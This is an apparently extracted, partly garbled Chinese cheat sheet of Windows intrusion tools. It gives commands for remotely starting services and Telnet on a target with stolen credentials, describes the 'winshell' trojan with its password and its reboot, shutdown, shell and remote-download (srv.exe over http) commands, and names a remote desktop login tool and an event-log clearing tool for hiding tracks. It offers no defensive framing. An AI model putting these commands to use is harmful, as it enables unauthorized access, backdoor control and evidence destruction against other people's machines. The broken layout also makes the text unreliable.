============================ 

一、netsvc.exe 

“

”

 

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的 时间任务 服务：

netsvc /list \\IP

 

地址

netsvc schedule \\IP

 

地址 /query 

netsvc \\IP

 

地址 schedule /start 

二、OpenTelnet.exe 

远程启动主机的 Telnet 服务，并绑定端口到 7878

 

，例如：

OpenTelnet \\IP

 

 

 

地址 用户名 密码 1 7878 

然后就可以 telnet 到主机的 7878 端口，进入 DOS

 

方式下：

telnet IP

 

地址 7878 

三、winshell.exe 

一个非常小的木马（不到 6K），telnet 到主机的 7878 端口，输入密码 winshell，当看到
CMD>

 

后，可打下面的命令：

p Path （查看 winshell

 

主程序的路径信息）

b reBoot 

 

（重新启动机器）

d shutDown 

 

（关闭机器）

s Shell 

“

（执行后你就会看到可爱的 C:\>”  

）

x eXit （退出本次登录会话，此命令并不终止 winshell

 

的运行）

CMD> http://.../srv.exe （通过 http 下载其他网站上的文件到运行 winshell

 

的机器上）

四、3389 登陆器，GUI

 

方式登录远程主机的

五、elsave.exe 

 

事件日志清除工具